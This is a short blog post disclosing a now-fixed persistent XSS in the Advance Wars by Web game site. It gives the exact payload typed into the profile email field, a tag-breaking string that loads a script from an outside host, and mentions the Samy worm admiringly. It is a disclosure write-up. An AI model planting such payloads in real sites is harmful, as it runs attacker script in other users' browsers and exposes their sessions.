AWBW Persistent XSS — Sami is my Hero

This post’s a short one, I just feel like recording a small vulnerability I found and reported. I mostly like my Proof of Concept, and frankly that’s the real reason I’m writing this.

In fact, skip reading the post, just check out the Proof of Concept.

Background

AWBW

Advance Wars by Web (aka AWBW) is a web-based turn-based strategy game based on nintendo’s Advance Wars game. You can read more about that here.

You can tell, just by clicking around on it, that it’s a big pile of php. The “guide.php” in that url is also a pretty big hint.

I don’t play, but when a friend linked it to me, I saw “.php”, which makes my brain immediately want to start typing SQL injection and XSS payloads into the nearest text input.

XSS

If you don’t know what XSS is, Wikipedia has you covered.

Perhaps the most famous XSS in existence is the Samy Worm, which spread to over a million MySpace users.

The Persistent XSS

So, let’s start with the proof of concept I created and sent to the AWBW team:

https://awbw.amarriner.com/profile.php?username=testxs

(web.archive.org link, since it has been fixed)

So, what was the exploit? Entering ></td></tr><script src="https://s.ek.gs/s.js">< into the email field.

And also checking the “display email” tickbox.

Timeline and Fix

The timeline is a bit fuzzy because I was not informed when they fixed it. I believe it’s roughly the following though:

How did they fix it?

They made it so the “display email” checkbox no longer displays your email anywhere, as far as I can tell. You can still enter a persistent XSS onto your own settings page via the email input, but you can’t get anyone else to view it.

They did also blank out the email field for my test account.

Conclusion

Typing into text fields is fun, but most of all Samy is my hero.